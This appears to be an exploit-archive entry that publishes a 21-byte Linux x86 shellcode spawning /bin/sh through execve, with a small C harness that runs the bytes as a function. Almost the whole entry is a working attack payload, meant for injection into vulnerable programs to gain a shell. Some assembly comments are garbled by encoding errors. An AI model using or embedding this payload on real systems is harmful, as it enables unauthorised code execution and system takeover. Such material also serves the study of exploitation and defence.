Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)

2009-01-01 17:05:04

/*
* (linux/x86) execve("/bin/sh",0,0)
* 21 bytes
*
* http://www.gonullyourself.org
* sToRm <[email protected]>
*/

char shellcode[] =
// <_start>
"\x31\xc9" // xor ìx,ìx
"\xf7\xe1" // mul ìx
"\x51" // push ìx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,ëx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
;

int main() {

int (*f)() = (int(*)())shellcode;
printf("Length: %u\n", strlen(shellcode));
f();

}

Fixes

No fixes

In order to submit a new fix you need to be registered.